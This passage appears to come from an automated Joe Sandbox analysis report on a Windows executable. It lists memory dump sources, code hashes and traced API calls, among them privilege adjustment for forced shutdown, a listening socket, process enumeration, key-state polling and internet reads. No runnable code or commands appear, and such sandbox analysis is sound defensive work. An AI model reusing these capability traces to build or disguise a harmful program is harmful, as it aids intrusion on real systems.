                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                    • API String ID: 0-1546025612
                    • Opcode ID: acb1fdbb4f8ae24c14d8721fd363a19faae4aee7f6f19622583a62faa769907c
                    • Instruction ID: fafa1babf9c73b6bcda15cef31be200da537c9f710ecb28753bb072f3f994ab7
                    • Opcode Fuzzy Hash: acb1fdbb4f8ae24c14d8721fd363a19faae4aee7f6f19622583a62faa769907c
                    • Instruction Fuzzy Hash: E1A28070E0421ACBDF28DF59C9807EDB7B1BF54318F1482AAD866A7280E7349E85DF54
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 14f1495c1bb13178f4e175acdb1d4b01662fa368362e1077ab394dd07efb6f13
                    • Instruction ID: 0180a51d912d52ab74f0410c93288733c4188f5b8f7195a88821710e4bc1f301
                    • Opcode Fuzzy Hash: 14f1495c1bb13178f4e175acdb1d4b01662fa368362e1077ab394dd07efb6f13
                    • Instruction Fuzzy Hash: 3E12BB70A00609DFCF14DFA5D985AEEB3B5FF48304F208169E406E7290EB36AE15DB64
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                      • Part of subcall function 00C72344: GetCursorPos.USER32(?), ref: 00C72357
                      • Part of subcall function 00C72344: ScreenToClient.USER32(00D367B0,?), ref: 00C72374
                      • Part of subcall function 00C72344: GetAsyncKeyState.USER32(00000001), ref: 00C72399
                      • Part of subcall function 00C72344: GetAsyncKeyState.USER32(00000002), ref: 00C723A7
                    • ReleaseCapture.USER32 ref: 00CFC2F0
                    • SetWindowTextW.USER32(?,00000000), ref: 00CFC39A
                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00CFC3AD
                    • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?), ref: 00CFC48F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                    • API String ID: 973565025-2107944366
                    • Opcode ID: ae3140d2cd106029fad4ad5ac186f876171c00e7de820880db534ef2b0e22f99
                    • Instruction ID: 894df80432f767e4e5b3bcf23a23bccdeb635e4ac7fd04aae7bec9ea1bef7f60
                    • Opcode Fuzzy Hash: ae3140d2cd106029fad4ad5ac186f876171c00e7de820880db534ef2b0e22f99
                    • Instruction Fuzzy Hash: 1C517B70204308AFD714DF24C896F7A7BE5EF88310F10852DF6A58B2E1CB71A959DB62
                    APIs
                      • Part of subcall function 00CC8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CC8D0D
                      • Part of subcall function 00CC8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CC8D3A
                      • Part of subcall function 00CC8CC3: GetLastError.KERNEL32 ref: 00CC8D47
                    • ExitWindowsEx.USER32(?,00000000), ref: 00CD549B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                    • String ID: $@$SeShutdownPrivilege
                    • API String ID: 2234035333-194228
                    • Opcode ID: 86dc829b910883d08b9370f7eff1328a5de31aa674a105b3e86938d6d7dd297f
                    • Instruction ID: 7d4d63d40170e8ff5f2710f52f42ed01fb3bb20b206c58e88ef2f1dd9c71a80e
                    • Instruction Fuzzy Hash: 4A01F731655A156BE7285678EC4AFBB7258EB04352F240127FE26E22D2DA505D8081A3
                    APIs
                    • socket.WS2_32(00000002,00000001,00000006), ref: 00CE65EF
                    • WSAGetLastError.WS2_32(00000000), ref: 00CE65FE
                    • bind.WS2_32(00000000,?,00000010), ref: 00CE661A
                    • listen.WS2_32(00000000,00000005), ref: 00CE6629
                    • WSAGetLastError.WS2_32(00000000), ref: 00CE6643
                    • closesocket.WS2_32(00000000), ref: 00CE6657
                    Similarity
                    • API ID: ErrorLast$bindclosesocketlistensocket
                    • String ID:
                    • API String ID: 1279440585-0
                    • Opcode ID: 9d00203acfbe8940704b8223a38a292893563569a21ad71b14597ac3c9dd3b94
                    • Instruction ID: 12d60170cf7241f2e04da9fa73b3d6b086e0851ae7639ac4b4f1c178f495d17c
                    • Instruction Fuzzy Hash: 2D219E312102009FDB10AF25C889B7EB7B9EF45360F148169F96AA73D1CB70AD01EB51
                    APIs
                      • Part of subcall function 00C90FF6: std::exception::exception.LIBCMT ref: 00C9102C
                      • Part of subcall function 00C90FF6: __CxxThrowException@8.LIBCMT ref: 00C91041
                    • _memmove.LIBCMT ref: 00CC062F
                    • _memmove.LIBCMT ref: 00CC0744
                    • _memmove.LIBCMT ref: 00CC07EB
                    Similarity
                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                    • String ID:
                    • API String ID: 1300846289-0
                    • Opcode ID: 76bfc0f7e2d02b04ff91be17c9116897bdcbd9588d5a83bb228707c83040827d
                    • Instruction ID: 273aaca7108bd678847e30fc5536441c6a35f12a043b409a2ffb7e7229aa57b0
                    • Instruction Fuzzy Hash: 8802A070E00209DFCF04DF65D985AAEBBB5FF44300F2480A9E80ADB295EB31DA55DB95
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                    • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00C719FA
                    • GetSysColor.USER32(0000000F), ref: 00C71A4E
                    • SetBkColor.GDI32(?,00000000), ref: 00C71A61
                      • Part of subcall function 00C71290: NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 00C712D8
                    Similarity
                    • API ID: ColorDialogNtdllProc_$LongWindow
                    • String ID:
                    • API String ID: 591255283-0
                    • Opcode ID: dacc055f07219a008b77ff2d16c331b98f70b35ac861656ad754c34148cfc3f7
                    • Instruction ID: 65fd40f84d1a1f71576af9cacda1bfa6fb8d7167f45a7961409dd983755163e9
                    • Instruction Fuzzy Hash: 16A16B70105549BFD628AB2E5C84EBF355DDF423A9B1CC11AFD1AD61D2DA10CE01F272
                    APIs
                      • Part of subcall function 00CE80A0: inet_addr.WS2_32(00000000), ref: 00CE80CB
                    • socket.WS2_32(00000002,00000002,00000011), ref: 00CE6AB1
                    • WSAGetLastError.WS2_32(00000000), ref: 00CE6ADA
                    • bind.WS2_32(00000000,?,00000010), ref: 00CE6B13
                    • WSAGetLastError.WS2_32(00000000), ref: 00CE6B20
                    • closesocket.WS2_32(00000000), ref: 00CE6B34
                    Similarity
                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                    • String ID:
                    • API String ID: 99427753-0
                    • Opcode ID: 923436eb0f81049c2ef060bfb5f1231480b2263656572c18be5caebce7f1daf6
                    • Instruction ID: 15a999e35d9b4dc667db3adcbf1d16b6a2ba1a86f6860c5c68ee3a6a1163df11
                    • Instruction Fuzzy Hash: 3A41A275640210AFEB10AB249C86F7E77A4EB45720F04C05CFA1AAB3D2CB749D01AB92
                    Similarity
                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                    • String ID:
                    • API String ID: 292994002-0
                    • Opcode ID: a794f53b9dc5d87656de971581b27a5e6f03e062d79bdfde15b67bac94e2dd64
                    • Instruction ID: 6a4a3f0dfc1e3ef049427424264d30ad1fceb056b7d4fde635a34553e660b0eb
                    • Instruction Fuzzy Hash: 7911B6713009155FD7111F26DC44B7F77A8EF44721B458029F726D7341CB709A02CAA6
                    Similarity
                    • API ID: __itow__swprintf
                    • String ID:
                    • API String ID: 674341424-0
                    • Opcode ID: e84cce3df415b672e661492a3ed03dc500391cc828e247d8bd49d3ffecef1f91
                    • Instruction ID: 88b6d6e11e03e97e73b46f5fe98d4fe2992e4869424d90d1c585f139982e0e7b
                    • Instruction Fuzzy Hash: 1322AB716083419FC724EF24C881BAFB7E4EF84714F10892DF99A97291DB71EA04DB96
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00CEF151
                    • Process32FirstW.KERNEL32(00000000,?), ref: 00CEF15F
                      • Part of subcall function 00C77F41: _memmove.LIBCMT ref: 00C77F82
                    • Process32NextW.KERNEL32(00000000,?), ref: 00CEF21F
                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00CEF22E
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                    • String ID:
                    • API String ID: 2576544623-0
                    • Opcode ID: d76aafac4f4bd462162f91054d7c57ffac4719d5ede1a61c592190818798c767
                    • Instruction ID: c9c84ff804d69ee1e1aac8788e4711bcfc6ff13d4fe24cdb7fe63d7addd3aca5
                    • Instruction Fuzzy Hash: 35517B715043009BD310EF20DC85A6FBBE8FF94710F10892DF599972A1EB70AA09DB92
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                    • GetCursorPos.USER32(?), ref: 00CFC7C2
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00CABBFB,?,?,?,?,?), ref: 00CFC7D7
                    • GetCursorPos.USER32(?), ref: 00CFC824
                    • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00CABBFB,?,?,?), ref: 00CFC85E
                    Similarity
                    • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                    • String ID:
                    • API String ID: 1423138444-0
                    • Opcode ID: 6412352bcc4fb276bdb8ca6a4a279637cb0e5ff5eabfcc93c7133fcf92d0ba53
                    • Instruction ID: 7a95e16fb07909d5d04fda03b2c7908e2f3e4745f0ff0b58529daff88efcf5c3
                    • Instruction Fuzzy Hash: 9C319E3560001CAFCB15CF59C8D8EFA7BB6EF09350F044069FA058B2A1C7369E51DBA1
                    APIs
                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00CD40D1
                    • _memset.LIBCMT ref: 00CD40F2
                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00CD4144
                    • CloseHandle.KERNEL32(00000000), ref: 00CD414D
                    Similarity
                    • API ID: CloseControlCreateDeviceFileHandle_memset
                    • String ID:
                    • API String ID: 1157408455-0
                    • Opcode ID: af1c6bbebab155f3fe833a1030dfe00d4474f1fd500497eb9f9566b75feade09
                    • Instruction ID: ace67df2ae32cb756cd92e3d874c7e325d02d76a56f9efb1f014250f04b927bb
                    • Instruction Fuzzy Hash: B61194759012287AD7309BA5AC4DFAFBB7CEF44760F1041AAFA08D7290D6744E84CBA5
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                    • NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 00C712D8
                    • GetClientRect.USER32(?,?), ref: 00CAB84B
                    • GetCursorPos.USER32(?), ref: 00CAB855
                    • ScreenToClient.USER32(?,?), ref: 00CAB860
                    Similarity
                    • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                    • String ID:
                    • API String ID: 1010295502-0
                    • Opcode ID: 0659609f1fbcda1197a8c97123bfc23782818e4488f79faeb918f6194e1f3acd
                    • Instruction ID: 58c5577d920affead642994f21add2ef52e97c8514feed7d2a8ce0ecad11c46f
                    • Instruction Fuzzy Hash: 22113A35900019BFCB00EF98D889AFE77B8EF05300F108456F915E7252C730BA52DBA6
                    APIs
                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00CCEB19
                    Similarity
                    • API ID: lstrlen
                    • String ID: ($|
                    • API String ID: 1659193697-1631851259
                    • Opcode ID: a3a3aaf094b3082e3032c8f6bc3451e316f819d207829b42de91d0c489350afc
                    • Instruction ID: 2f862137c7a6f43d2e9985079583ca2ced3d713ac8c2f76b710aace8ad12f930
                    • Instruction Fuzzy Hash: DD323675A006059FCB28CF59C491E6AB7F1FF48310B15C56EE8AADB3A1D770E981CB44
                    APIs
                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00CE26D5
                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00CE270C
                    Similarity
                    • API ID: Internet$AvailableDataFileQueryRead
                    • String ID:
                    • API String ID: 599397726-0
                    • Opcode ID: c96708974c088428d50691e0e70fab3496225f683b85408c90e403badf0deb26
                    • Instruction ID: 5247e430b9bd3ed0baca45180e5749b1ac5e3f620a0ee1373f22069bbdb72087
                    • Instruction Fuzzy Hash: 5941C371500389BFEB20DE96DC85FBFB7BCEB40768F10406EFA15A6140EA719E41A664
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00CDB5AE
                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00CDB608
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00CDB655
                    Similarity
                    • API ID: ErrorMode$DiskFreeSpace
                    • String ID:
                    • API String ID: 1682464887-0
                    • Opcode ID: fe45aca3eabfea97706331a8ed4b891b21d1b379c1265ebc7fed3ee3fc33b983
                    • Instruction ID: 8a4d5e00d2885a11e87baa58dfb7eb5c680057228a31cc924a068e484acb84ae
                    • Instruction Fuzzy Hash: C0217135A00118EFCB00EF65D880EADBBB8FF48310F1480AAE905EB351DB31A956DF51
                    APIs
                      • Part of subcall function 00C90FF6: std::exception::exception.LIBCMT ref: 00C9102C
                      • Part of subcall function 00C90FF6: __CxxThrowException@8.LIBCMT ref: 00C91041
                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CC8D0D
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CC8D3A
                    • GetLastError.KERNEL32 ref: 00CC8D47
                    Similarity
                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                    • String ID:
                    • API String ID: 1922334811-0
                    • Opcode ID: 8c634d09acdfe55f1e214634564051fa462a8be689a0ca58afdc757e4feeb8dc
                    • Instruction ID: 714d95bdf810443db2c99ed305b7ebb5680bbcdc75aed6d92c71af0274fd76a7
                    • Instruction Fuzzy Hash: 96118FB1414209AFD7289F54DC85E7BB7B8EF44710B20852EF45693251EF70AD45CB60
                    APIs
                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00CD4C2C
                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00CD4C43
                    • FreeSid.ADVAPI32(?), ref: 00CD4C53
                    Similarity
                    • API ID: AllocateCheckFreeInitializeMembershipToken
                    • String ID:
                    • API String ID: 3429775523-0
                    • Opcode ID: 8fd4cbffe2d56bffc3f2224183c133c0ac844804d70f6a2355062572018dcb55
                    • Instruction ID: 1ef7563e315b5de7ec819387c38ea5656f1d3b8e3636a1e4b45bab15e65bfaa2
                    • Instruction Fuzzy Hash: 60F03775A11208BBDB04DFE09C89ABEBBB8EF08201F0044A9AA01E2281E7706A048B51
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6368e9a70a704e3acc632939c2e409b6e27e2c7eceff694b34551c548bcadf54
                    • Instruction ID: 77891f6739af032bd26f4e17e4046ece66594f5c51303f7bc7b104ab9ef39056
                    • Opcode Fuzzy Hash: 6368e9a70a704e3acc632939c2e409b6e27e2c7eceff694b34551c548bcadf54
                    • Instruction Fuzzy Hash: 8C22B172A00215CFDB24DF54C485AAEBBF0FF08300F14C1A9E86A9B351E731AE81DB91
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                      • Part of subcall function 00C725DB: GetWindowLongW.USER32(?,000000EB), ref: 00C725EC
                    • GetParent.USER32(?), ref: 00CABA0A
                    • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,00C719B3,?,?,?,00000006,?), ref: 00CABA84
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: LongWindow$DialogNtdllParentProc_
                    • String ID:
                    • API String ID: 314495775-0
                    • Opcode ID: eed0d8e7881dee59f2d9c7d816a32b0beb4d8e8f2fd47a14ad79f7f680c326a9
                    • Instruction ID: 2a26776251119371a97172eb9504111f9bf5eb78cb3e39cd4a77daece22cd7bc
                    • Opcode Fuzzy Hash: eed0d8e7881dee59f2d9c7d816a32b0beb4d8e8f2fd47a14ad79f7f680c326a9
                    • Instruction Fuzzy Hash: 46217634604144BFCB248F6CC885EA93B96EF0A364F588254F9395B3F2C7319E51E760
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 00CDC966
                    • FindClose.KERNEL32(00000000), ref: 00CDC996
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID:
                    • API String ID: 2295610775-0
                    • Opcode ID: 94ea81d98a9068f7fdcfaa596f56c5b27a5055e63b07e41332d8af3093a7aa90
                    • Instruction ID: e265e57c6c43420f02832cc52735bca670970790d8d5b4d1820940bcc8ff19a4
                    • Opcode Fuzzy Hash: 94ea81d98a9068f7fdcfaa596f56c5b27a5055e63b07e41332d8af3093a7aa90
                    • Instruction Fuzzy Hash: 24115E726106009FDB10EF29D885A2AF7E9EF84324F00C51EF9A9D73A1DB30AD05DB81
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                    • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00CABB8A,?,?,?), ref: 00CFC8E1
                      • Part of subcall function 00C725DB: GetWindowLongW.USER32(?,000000EB), ref: 00C725EC
                    • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00CFC8C7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: LongWindow$DialogMessageNtdllProc_Send
                    • String ID:
                    • API String ID: 1273190321-0
                    • Opcode ID: 0a355dd991b1ee06359977df16b0f744726b50e8af673576714d8cb69e409b00
                    • Instruction ID: e2053491652ab16dce19fcb849c332bdfcd67ff09156b29e87ee5dae3115498c
                    • Opcode Fuzzy Hash: 0a355dd991b1ee06359977df16b0f744726b50e8af673576714d8cb69e409b00
                    • Instruction Fuzzy Hash: E201D83130020CBBCB215F14CD84F7A7BA6FF89364F144028FA554B2E0CB719802EBA2
                    APIs
                    • ClientToScreen.USER32(?,?), ref: 00CFCC51
                    • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,00CABC66,?,?,?,?,?), ref: 00CFCC7A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ClientDialogNtdllProc_Screen
                    • String ID:
                    • API String ID: 3420055661-0
                    • Opcode ID: 1cdd3b2489fbfca3e17e997dd48919b929b92a9b6b0737ffb41cbc29500df196
                    • Instruction ID: a66b3847eea935efdcb2a013001b00ed26cfade9f1067bdbc800cfaa1598633f
                    • Opcode Fuzzy Hash: 1cdd3b2489fbfca3e17e997dd48919b929b92a9b6b0737ffb41cbc29500df196
                    • Instruction Fuzzy Hash: DCF0177240021CBFEB048F85DD49ABE7BB9EF48311F00416AF905A2261D771AA61EBA5
                    APIs
                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00CE977D,?,00CFFB84,?), ref: 00CDA302
                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00CE977D,?,00CFFB84,?), ref: 00CDA314
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ErrorFormatLastMessage
                    • String ID:
                    • API String ID: 3479602957-0
                    • Opcode ID: 940d260cc7504c1a17b450933a0fc96e362af15c3da567e85f8f8a883a406c65
                    • Instruction ID: 8b67260c866924cfebb5909c94c9d7373e5f74e5e4b6304f0573148dbd9bb9d7
                    • Opcode Fuzzy Hash: 940d260cc7504c1a17b450933a0fc96e362af15c3da567e85f8f8a883a406c65
                    • Instruction Fuzzy Hash: 9DF0823554422DABDB109FA4CC48FEA776DFF09761F00826AF918D6291D6309944CBA1
                    APIs
                    • GetWindowLongW.USER32(?,000000EC), ref: 00CFCD74
                    • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00CABBE5,?,?,?,?), ref: 00CFCDA2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: DialogLongNtdllProc_Window
                    • String ID:
                    • API String ID: 2065330234-0
                    • Opcode ID: 17d22356339303ba193ad5ded20a3eca26954802daa5447d122f5e1eb850437a
                    • Instruction ID: b92093600930380e27d2a6680b1daacc67e23281990c1aea35a7adc722d2a179
                    • Opcode Fuzzy Hash: 17d22356339303ba193ad5ded20a3eca26954802daa5447d122f5e1eb850437a
                    • Instruction Fuzzy Hash: 92E0867020025CBFEB155F19DC49FBE3B54EB04750F408229F956D90E1C7719851D761
                    APIs
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00CC8851), ref: 00CC8728
                    • CloseHandle.KERNEL32(?,?,00CC8851), ref: 00CC873A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: AdjustCloseHandlePrivilegesToken
                    • String ID:
                    • API String ID: 81990902-0
